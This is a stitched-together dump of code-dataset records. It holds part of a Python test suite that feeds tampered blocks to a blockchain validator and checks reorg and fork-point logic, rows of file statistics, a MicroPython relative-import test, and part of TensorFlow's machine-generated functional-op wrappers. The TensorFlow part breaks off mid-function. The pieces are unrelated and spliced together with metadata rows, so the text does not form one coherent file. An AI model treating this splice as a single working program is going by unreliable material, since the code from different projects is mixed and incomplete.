        db_path = Path("blockchain_test.db")
        if db_path.exists():
            db_path.unlink()
        connection = await aiosqlite.connect(db_path)
        store = await BlockStore.create(connection)
        coin_store = await CoinStore.create(connection)
        b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
        for i in range(1, 9):
            result, removed, error_code = await b.receive_block(blocks[i])
            assert result == ReceiveBlockResult.ADDED_TO_HEAD
        yield (blocks, b)
        await connection.close()

    @staticmethod
    def _header_data_with(block, **overrides):
        """Return a copy of ``block``'s HeaderData with the given fields replaced.

        Fields are passed positionally in declared HeaderData order (dict
        insertion order, guaranteed on Python 3.7+), so only the overridden
        fields differ from the original header.
        """
        d = block.header.data
        fields = {
            "height": d.height,
            "prev_header_hash": d.prev_header_hash,
            "timestamp": d.timestamp,
            "filter_hash": d.filter_hash,
            "proof_of_space_hash": d.proof_of_space_hash,
            "weight": d.weight,
            "total_iters": d.total_iters,
            "additions_root": d.additions_root,
            "removals_root": d.removals_root,
            "farmer_rewards_puzzle_hash": d.farmer_rewards_puzzle_hash,
            "total_transaction_fees": d.total_transaction_fees,
            "pool_target": d.pool_target,
            "aggregated_signature": d.aggregated_signature,
            "cost": d.cost,
            "extension_data": d.extension_data,
            "generator_hash": d.generator_hash,
        }
        fields.update(overrides)
        return HeaderData(*fields.values())

    @staticmethod
    def _resigned_block(block, new_header_data, proof_of_space=None):
        """Rebuild ``block`` around ``new_header_data``, re-signing the header
        with the original plot public key.  ``proof_of_space`` optionally
        swaps in a different proof (used by the invalid-PoS tests)."""
        return FullBlock(
            block.proof_of_space if proof_of_space is None else proof_of_space,
            block.proof_of_time,
            Header(
                new_header_data,
                bt.get_plot_signature(
                    new_header_data, block.proof_of_space.plot_public_key
                ),
            ),
            block.transactions_generator,
            block.transactions_filter,
        )

    @staticmethod
    def _corrupt_pos(block):
        """Return a ProofOfSpace identical to ``block``'s except that the
        first proof byte is incremented (mod 256), invalidating the proof."""
        bad_pos_proof = bytearray(block.proof_of_space.proof)
        bad_pos_proof[0] = uint8((bad_pos_proof[0] + 1) % 256)
        return ProofOfSpace(
            block.proof_of_space.challenge_hash,
            block.proof_of_space.pool_public_key,
            block.proof_of_space.plot_public_key,
            block.proof_of_space.size,
            bytes(bad_pos_proof),
        )

    @pytest.mark.asyncio
    async def test_prev_pointer(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Point the header at a nonexistent previous block.  The original
        # plot signature is reused on purpose: only the pointer is wrong.
        block_bad = FullBlock(
            blocks[9].proof_of_space,
            blocks[9].proof_of_time,
            Header(
                self._header_data_with(blocks[9], prev_header_hash=bytes([1] * 32)),
                blocks[9].header.plot_signature,
            ),
            blocks[9].transactions_generator,
            blocks[9].transactions_filter,
        )
        result, removed, error_code = await b.receive_block(block_bad)
        assert result == ReceiveBlockResult.DISCONNECTED_BLOCK
        assert error_code is None

    @pytest.mark.asyncio
    async def test_prev_block(self, initial_blockchain):
        blocks, b = initial_blockchain
        # blocks[10] references blocks[9], which was never added to the chain.
        block_bad = blocks[10]
        result, removed, error_code = await b.receive_block(block_bad)
        assert result == ReceiveBlockResult.DISCONNECTED_BLOCK
        assert error_code is None

    @pytest.mark.asyncio
    async def test_timestamp(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Time too far in the past
        new_header_data = self._header_data_with(
            blocks[9], timestamp=blocks[9].header.data.timestamp - 1000
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.TIMESTAMP_TOO_FAR_IN_PAST
        # Time too far in the future (3 hours ahead of wall-clock now)
        new_header_data = self._header_data_with(
            blocks[9], timestamp=uint64(int(time.time() + 3600 * 3))
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.TIMESTAMP_TOO_FAR_IN_FUTURE

    @pytest.mark.asyncio
    async def test_generator_hash(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Header commits to a generator hash that does not match the block's
        # transactions generator.
        new_header_data = self._header_data_with(
            blocks[9], generator_hash=bytes([1] * 32)
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_TRANSACTIONS_GENERATOR_HASH

    @pytest.mark.asyncio
    async def test_plot_signature(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Sign the header with an unrelated key over random data.
        block_bad = FullBlock(
            blocks[9].proof_of_space,
            blocks[9].proof_of_time,
            Header(
                blocks[9].header.data,
                AugSchemeMPL.sign(
                    AugSchemeMPL.key_gen(bytes([5] * 32)), token_bytes(32)
                ),
            ),
            blocks[9].transactions_generator,
            blocks[9].transactions_filter,
        )
        result, removed, error_code = await b.receive_block(block_bad)
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_PLOT_SIGNATURE

    @pytest.mark.asyncio
    async def test_invalid_pos(self, initial_blockchain):
        blocks, b = initial_blockchain
        bad_pos = self._corrupt_pos(blocks[9])
        # Header commits to the corrupted proof AND the block carries it, so
        # the proof of space itself fails validation.
        new_header_data = self._header_data_with(
            blocks[9], proof_of_space_hash=bad_pos.get_hash()
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data, proof_of_space=bad_pos)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_POSPACE

    @pytest.mark.asyncio
    async def test_invalid_pos_hash(self, initial_blockchain):
        blocks, b = initial_blockchain
        bad_pos = self._corrupt_pos(blocks[9])
        # Header commits to the corrupted proof but the block still carries
        # the ORIGINAL proof, so only the hash commitment is wrong.
        new_header_data = self._header_data_with(
            blocks[9], proof_of_space_hash=bad_pos.get_hash()
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_POSPACE_HASH

    @pytest.mark.asyncio
    async def test_invalid_filter_hash(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Header commits to a filter hash that does not match the block's
        # transactions filter.
        new_header_data = self._header_data_with(
            blocks[9], filter_hash=bytes32(bytes([3] * 32))
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_TRANSACTIONS_FILTER_HASH

    @pytest.mark.asyncio
    async def test_invalid_max_height(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Pool target limited to height 8 — presumably below this block's
        # height, making the target invalid.  The signature over it is valid.
        pool_target = PoolTarget(
            blocks[9].header.data.pool_target.puzzle_hash, uint32(8)
        )
        agg_sig = bt.get_pool_key_signature(
            pool_target, blocks[9].proof_of_space.pool_public_key
        )
        assert agg_sig is not None
        new_header_data = self._header_data_with(
            blocks[9], pool_target=pool_target, aggregated_signature=agg_sig
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_POOL_TARGET

    @pytest.mark.asyncio
    async def test_invalid_pool_sig(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Signature over a DIFFERENT pool target; the header keeps the
        # original pool target, so the aggregate signature no longer matches.
        pool_target = PoolTarget(
            blocks[9].header.data.pool_target.puzzle_hash, uint32(10)
        )
        agg_sig = bt.get_pool_key_signature(
            pool_target, blocks[9].proof_of_space.pool_public_key
        )
        assert agg_sig is not None
        new_header_data = self._header_data_with(
            blocks[9], aggregated_signature=agg_sig
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.BAD_AGGREGATE_SIGNATURE

    @pytest.mark.asyncio
    async def test_invalid_fees_amount(self, initial_blockchain):
        blocks, b = initial_blockchain
        # Claim one more mojo of fees than the block actually collects.
        new_header_data = self._header_data_with(
            blocks[9],
            total_transaction_fees=blocks[9].header.data.total_transaction_fees + 1,
        )
        result, removed, error_code = await b.receive_block(
            self._resigned_block(blocks[9], new_header_data)
        )
        assert result == ReceiveBlockResult.INVALID_BLOCK
        assert error_code == Err.INVALID_BLOCK_FEE_AMOUNT

    @pytest.mark.asyncio
    async def test_difficulty_change(self):
        num_blocks = 10
        # Make it much faster than target time, 1 second instead of 10 seconds, so difficulty goes up
        blocks = bt.get_consecutive_blocks(test_constants, num_blocks, [], 1)
        db_path = Path("blockchain_test.db")
        if db_path.exists():
            db_path.unlink()
        connection = await aiosqlite.connect(db_path)
        coin_store = await CoinStore.create(connection)
        store = await BlockStore.create(connection)
        b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
        for i in range(1, num_blocks):
            result, removed, error_code = await b.receive_block(blocks[i])
            assert result == ReceiveBlockResult.ADDED_TO_HEAD
            assert error_code is None
        diff_6 = b.get_next_difficulty(blocks[5].header)
        diff_7 = b.get_next_difficulty(blocks[6].header)
        diff_8 = b.get_next_difficulty(blocks[7].header)
        # diff_9 = b.get_next_difficulty(blocks[8].header)
        # Difficulty is flat inside an epoch, rises at the epoch boundary,
        # and the rise is capped by DIFFICULTY_FACTOR.
        assert diff_6 == diff_7
        assert diff_8 > diff_7
        assert (diff_8 / diff_7) <= test_constants.DIFFICULTY_FACTOR
        assert (b.get_next_min_iters(blocks[1])) == test_constants.MIN_ITERS_STARTING
        assert (b.get_next_min_iters(blocks[6])) == (b.get_next_min_iters(blocks[5]))
        assert (b.get_next_min_iters(blocks[7])) > (b.get_next_min_iters(blocks[6]))
        assert (b.get_next_min_iters(blocks[8])) == (b.get_next_min_iters(blocks[7]))
        await connection.close()
        b.shut_down()
class TestReorgs:
    """Tests for chain reorganisations, LCA tracking and fork-point search."""

    @staticmethod
    async def _fresh_blockchain():
        """Delete any leftover test database and return ``(connection, b)``
        for a brand-new Blockchain backed by a fresh sqlite file."""
        db_path = Path("blockchain_test.db")
        if db_path.exists():
            db_path.unlink()
        connection = await aiosqlite.connect(db_path)
        coin_store = await CoinStore.create(connection)
        store = await BlockStore.create(connection)
        b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
        return connection, b

    @pytest.mark.asyncio
    async def test_basic_reorg(self):
        blocks = bt.get_consecutive_blocks(test_constants, 15, [], 9)
        connection, b = await self._fresh_blockchain()
        for i in range(1, len(blocks)):
            await b.receive_block(blocks[i])
        assert b.get_current_tips()[0].height == 15
        # Fork off after height 9 with a 7-block alternative chain.
        blocks_reorg_chain = bt.get_consecutive_blocks(
            test_constants, 7, blocks[:10], 9, b"2"
        )
        for i in range(1, len(blocks_reorg_chain)):
            reorg_block = blocks_reorg_chain[i]
            result, removed, error_code = await b.receive_block(reorg_block)
            if reorg_block.height < 10:
                assert result == ReceiveBlockResult.ALREADY_HAVE_BLOCK
            elif reorg_block.height < 14:
                assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
            elif reorg_block.height >= 15:
                assert result == ReceiveBlockResult.ADDED_TO_HEAD
            assert error_code is None
        assert b.get_current_tips()[0].height == 16
        await connection.close()
        b.shut_down()

    @pytest.mark.asyncio
    async def test_reorg_from_genesis(self):
        blocks = bt.get_consecutive_blocks(test_constants, 20, [], 9, b"0")
        connection, b = await self._fresh_blockchain()
        for i in range(1, len(blocks)):
            await b.receive_block(blocks[i])
        assert b.get_current_tips()[0].height == 20
        # Reorg from genesis
        blocks_reorg_chain = bt.get_consecutive_blocks(
            test_constants, 21, [blocks[0]], 9, b"3"
        )
        for i in range(1, len(blocks_reorg_chain)):
            reorg_block = blocks_reorg_chain[i]
            result, removed, error_code = await b.receive_block(reorg_block)
            if reorg_block.height == 0:
                assert result == ReceiveBlockResult.ALREADY_HAVE_BLOCK
            elif reorg_block.height < 19:
                assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
            else:
                assert result == ReceiveBlockResult.ADDED_TO_HEAD
        assert b.get_current_tips()[0].height == 21
        # Reorg back to original branch
        blocks_reorg_chain_2 = bt.get_consecutive_blocks(
            test_constants, 3, blocks[:-1], 9, b"4"
        )
        result, _, error_code = await b.receive_block(blocks_reorg_chain_2[20])
        assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
        result, _, error_code = await b.receive_block(blocks_reorg_chain_2[21])
        assert result == ReceiveBlockResult.ADDED_TO_HEAD
        result, _, error_code = await b.receive_block(blocks_reorg_chain_2[22])
        assert result == ReceiveBlockResult.ADDED_TO_HEAD
        await connection.close()
        b.shut_down()

    @pytest.mark.asyncio
    async def test_lca(self):
        blocks = bt.get_consecutive_blocks(test_constants, 5, [], 9, b"0")
        connection, b = await self._fresh_blockchain()
        for i in range(1, len(blocks)):
            await b.receive_block(blocks[i])
        assert b.lca_block.header_hash == blocks[3].header_hash
        # Two competing blocks at height 5 move the LCA up to height 4.
        block_5_2 = bt.get_consecutive_blocks(test_constants, 1, blocks[:5], 9, b"1")
        block_5_3 = bt.get_consecutive_blocks(test_constants, 1, blocks[:5], 9, b"2")
        await b.receive_block(block_5_2[5])
        assert b.lca_block.header_hash == blocks[4].header_hash
        await b.receive_block(block_5_3[5])
        assert b.lca_block.header_hash == blocks[4].header_hash
        # A full reorg from genesis drops the LCA back to the genesis block.
        reorg = bt.get_consecutive_blocks(test_constants, 6, [], 9, b"3")
        for i in range(1, len(reorg)):
            await b.receive_block(reorg[i])
        assert b.lca_block.header_hash == blocks[0].header_hash
        await connection.close()
        b.shut_down()

    @pytest.mark.asyncio
    async def test_find_fork_point(self):
        # Three chains sharing prefixes of different lengths with ``blocks``.
        blocks = bt.get_consecutive_blocks(test_constants, 10, [], 9, b"7")
        blocks_2 = bt.get_consecutive_blocks(test_constants, 6, blocks[:5], 9, b"8")
        blocks_3 = bt.get_consecutive_blocks(test_constants, 8, blocks[:3], 9, b"9")
        blocks_reorg = bt.get_consecutive_blocks(test_constants, 3, blocks[:9], 9, b"9")
        connection, b = await self._fresh_blockchain()
        for i in range(1, len(blocks)):
            await b.receive_block(blocks[i])
        for i in range(1, len(blocks_2)):
            await b.receive_block(blocks_2[i])
        assert (
            find_fork_point_in_chain(b.headers, blocks[10].header, blocks_2[10].header)
            == 4
        )
        for i in range(1, len(blocks_3)):
            await b.receive_block(blocks_3[i])
        assert (
            find_fork_point_in_chain(b.headers, blocks[10].header, blocks_3[10].header)
            == 2
        )
        assert b.lca_block.data == blocks[2].header.data
        for i in range(1, len(blocks_reorg)):
            await b.receive_block(blocks_reorg[i])
        assert (
            find_fork_point_in_chain(
                b.headers, blocks[10].header, blocks_reorg[10].header
            )
            == 8
        )
        assert (
            find_fork_point_in_chain(
                b.headers, blocks_2[10].header, blocks_reorg[10].header
            )
            == 4
        )
        assert b.lca_block.data == blocks[4].header.data
        await connection.close()
        b.shut_down()

    @pytest.mark.asyncio
    async def test_get_header_hashes(self):
        blocks = bt.get_consecutive_blocks(test_constants, 5, [], 9, b"0")
        connection, b = await self._fresh_blockchain()
        for i in range(1, len(blocks)):
            await b.receive_block(blocks[i])
        header_hashes = b.get_header_hashes(blocks[-1].header_hash)
        # Genesis + 5 generated blocks, in chain order.
        assert len(header_hashes) == 6
        assert header_hashes == [block.header_hash for block in blocks]
        await connection.close()
        b.shut_down()
| 40.025469 | 101 | 0.619311 | 3,646 | 29,859 | 4.807186 | 0.061711 | 0.088264 | 0.115707 | 0.14937 | 0.865921 | 0.848519 | 0.815884 | 0.772351 | 0.737548 | 0.722656 | 0 | 0.022449 | 0.283901 | 29,859 | 745 | 102 | 40.079195 | 0.797259 | 0.013095 | 0 | 0.715582 | 0 | 0 | 0.011211 | 0.002522 | 0 | 0 | 0 | 0 | 0.099849 | 1 | 0.001513 | false | 0 | 0.028744 | 0 | 0.034796 | 0.001513 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7cbb3c6d735272e5f7ef9a5e1125aa8a9ecf686b | 324 | py | Python | tests/bytecode/mp-tests/import6.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/import6.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/import6.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | from . import bar
from .. import bar
from ... import bar
from .... import bar
from ..... import bar
from ...... import bar
from . import bar as abc
from .foo import bar
from ..foo import bar
from ...foo import bar
from .foo.bar import baz
from ..foo.bar import baz
from ...foo.bar import baz
from .foo.bar import baz as abc
| 21.6 | 31 | 0.694444 | 57 | 324 | 3.947368 | 0.122807 | 0.4 | 0.52 | 0.453333 | 0.955556 | 0.955556 | 0.955556 | 0.955556 | 0.955556 | 0.955556 | 0 | 0 | 0.185185 | 324 | 14 | 32 | 23.142857 | 0.852273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
7cfca439f796e70e27d9b8a7c669af5c03cfbf44 | 56,906 | py | Python | python3/lib/python3.6/site-packages/tensorflow/python/ops/gen_functional_ops.py | TruongThuyLiem/keras2tensorflow | 726f2370160701081cb43fbd8b56154c10d7ad63 | [
"MIT"
] | 3 | 2020-10-12T15:47:01.000Z | 2022-01-14T19:51:26.000Z | python3/lib/python3.6/site-packages/tensorflow/python/ops/gen_functional_ops.py | TruongThuyLiem/keras2tensorflow | 726f2370160701081cb43fbd8b56154c10d7ad63 | [
"MIT"
] | null | null | null | python3/lib/python3.6/site-packages/tensorflow/python/ops/gen_functional_ops.py | TruongThuyLiem/keras2tensorflow | 726f2370160701081cb43fbd8b56154c10d7ad63 | [
"MIT"
] | 2 | 2020-08-03T13:02:06.000Z | 2020-11-04T03:15:44.000Z | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: functional_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
def case(branch_index, input, Tout, branches, output_shapes=[], name=None):
  r"""An n-way switch statement which calls a single branch function.

  An n-way switch statement, implementing the following:
  ```
  switch (branch_index) {
    case 0:
      output = branches[0](input);
      break;
    case 1:
      output = branches[1](input);
      break;
    ...
    case [[nbranches-1]]:
    default:
      output = branches[nbranches-1](input);
      break;
  }
  ```

  Args:
    branch_index: A `Tensor` of type `int32`.
      The branch selector, an int32 Tensor.
    input: A list of `Tensor` objects.
      A list of input tensors passed to the branch function.
    Tout: A list of `tf.DTypes`. A list of output types.
    branches: A list of functions decorated with @Defun that has length `>= 1`.
      A list of functions each of which takes 'inputs' and returns a list of
      tensors, whose types are the same as what every other branch returns.
    output_shapes: An optional list of shapes (each a `tf.TensorShape` or list of `ints`). Defaults to `[]`.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `Tout`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.  NOTE: the arguments to
    # TFE_Py_FastPathExecute are positional and order-sensitive.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name, "Case",
        name, _ctx._post_execution_callbacks, branch_index, input, "Tout",
        Tout, "branches", branches, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; retry via the slower Python eager path.
      try:
        return case_eager_fallback(
            branch_index, input, Tout=Tout, branches=branches,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as Python exceptions, tagging the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate and normalize the attributes, then build the node.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'case' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  if not isinstance(branches, (list, tuple)):
    raise TypeError(
        "Expected list for 'branches' argument to "
        "'case' Op, not %r." % branches)
  if output_shapes is None:
    output_shapes = []
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'case' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "Case", branch_index=branch_index, input=input, Tout=Tout,
                branches=branches, output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  if not _result:
    return _op
  _inputs_flat = _op.inputs
  _attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"),
            "branches", _op.get_attr("branches"), "output_shapes",
            _op.get_attr("output_shapes"))
  # Register the op so gradients can flow through it.
  _execute.record_gradient(
      "Case", _inputs_flat, _attrs, _result, name)
  return _result
def Case(branch_index, input, Tout, branches, output_shapes=[], name=None):
  # Raw-op alias: forwards every argument to `case` by keyword.
  return case(branch_index=branch_index, input=input, Tout=Tout, branches=branches, output_shapes=output_shapes, name=name)
Case.__doc__ = case.__doc__
# Hide from generated API docs and force keyword-only calls, then expose the
# alias under tf.raw_ops.Case.
Case = _doc_controls.do_not_generate_docs(_kwarg_only(Case))
tf_export("raw_ops.Case")(Case)
def case_eager_fallback(branch_index, input, Tout, branches, output_shapes=[], name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function case
  """
  _ctx = ctx if ctx else _context.context()
  # Same attribute validation/normalization as the graph-mode path of `case`.
  if not isinstance(Tout, (list, tuple)):
    raise TypeError(
        "Expected list for 'Tout' argument to "
        "'case' Op, not %r." % Tout)
  Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
  if not isinstance(branches, (list, tuple)):
    raise TypeError(
        "Expected list for 'branches' argument to "
        "'case' Op, not %r." % branches)
  if output_shapes is None:
    output_shapes = []
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'case' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Convert the heterogeneous inputs to eager tensors; Tin records the
  # resulting dtypes for the op's attr list.
  _attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  branch_index = _ops.convert_to_tensor(branch_index, _dtypes.int32)
  _inputs_flat = [branch_index] + list(input)
  _attrs = ("Tin", _attr_Tin, "Tout", Tout, "branches", branches,
  "output_shapes", output_shapes)
  _result = _execute.execute(b"Case", len(Tout), inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "Case", _inputs_flat, _attrs, _result, name)
  return _result
def fake_param(dtype, shape, name=None):
  r""" This op is used as a placeholder in If branch functions. It doesn't provide a
  valid output when run, so must either be removed (e.g. replaced with a
  function input) or guaranteed not to be used (e.g. if mirroring an
  intermediate output needed for the gradient computation of the other branch).

  Args:
    dtype: A `tf.DType`. The type of the output.
    shape: A `tf.TensorShape` or list of `ints`.
      The purported shape of the output. This is only used for shape inference;
      the output will not necessarily have this shape. Can be a partial shape.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `dtype`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first (positional, order-sensitive).
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "FakeParam", name, _ctx._post_execution_callbacks, "dtype", dtype,
        "shape", shape)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; retry via the slower Python eager path.
      try:
        return fake_param_eager_fallback(
            dtype=dtype, shape=shape, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as Python exceptions, tagging the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: normalize the attrs and build the node via the op-def library.
  dtype = _execute.make_type(dtype, "dtype")
  shape = _execute.make_shape(shape, "shape")
  _, _, _op = _op_def_lib._apply_op_helper(
        "FakeParam", dtype=dtype, shape=shape, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("dtype", _op.get_attr("dtype"), "shape", _op.get_attr("shape"))
  # Register the op so gradients can flow through it.
  _execute.record_gradient(
      "FakeParam", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def FakeParam(dtype, shape, name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return fake_param(dtype, shape, name=name)
FakeParam.__doc__ = fake_param.__doc__
FakeParam = _doc_controls.do_not_generate_docs(_kwarg_only(FakeParam))
tf_export("raw_ops.FakeParam")(FakeParam)
def fake_param_eager_fallback(dtype, shape, name=None, ctx=None):
  r"""Eager-mode slow path for `fake_param`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  dtype = _execute.make_type(dtype, "dtype")
  shape = _execute.make_shape(shape, "shape")
  _inputs_flat = []
  _attrs = ("dtype", dtype, "shape", shape)
  _outputs = _execute.execute(b"FakeParam", 1, inputs=_inputs_flat,
                              attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "FakeParam", _inputs_flat, _attrs, _outputs, name)
  # Single-output op: return the lone tensor.
  return _outputs[0]
def _for(start, limit, delta, input, body, name=None):
  r"""```python
   output = input;
   for i in range(start, limit, delta)
      output = body(i, output);
  ```

  Args:
    start: A `Tensor` of type `int32`. The lower bound. An int32
    limit: A `Tensor` of type `int32`. The upper bound. An int32
    delta: A `Tensor` of type `int32`. The increment. An int32
    input: A list of `Tensor` objects.
      A list of input tensors whose types are T.
    body: A function decorated with @Defun.
      A function that takes a list of tensors (int32, T) and returns another
      list of tensors (T).
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects. Has the same type as `input`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the fast C execution path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name, "For",
        name, _ctx._post_execution_callbacks, start, limit, delta, input,
        "body", body)
      return _result
    except _core._FallbackException:
      # Fast path could not handle these arguments; retry via the Python
      # slow path.
      try:
        return _for_eager_fallback(
            start, limit, delta, input, body=body, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise op failures as TF errors, appending the op name for context.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "For", start=start, limit=limit, delta=delta, input=input, body=body,
        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("T", _op.get_attr("T"), "body", _op.get_attr("body"))
  _execute.record_gradient(
      "For", _inputs_flat, _attrs, _result, name)
  return _result
def For(start, limit, delta, input, body, name=None):
  # Raw-op alias: forward to the snake_case implementation unchanged.
  return _for(start, limit, delta, input, body, name=name)
For.__doc__ = _for.__doc__
For = _doc_controls.do_not_generate_docs(_kwarg_only(For))
tf_export("raw_ops.For")(For)
def _for_eager_fallback(start, limit, delta, input, body, name=None, ctx=None):
  r"""Eager-mode slow path for `_for`.

  Invoked when the fast C execution path raises `_FallbackException`.
  """
  _ctx = ctx or _context.context()
  _attr_T, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
  # Loop bounds are always int32 scalar tensors.
  start = _ops.convert_to_tensor(start, _dtypes.int32)
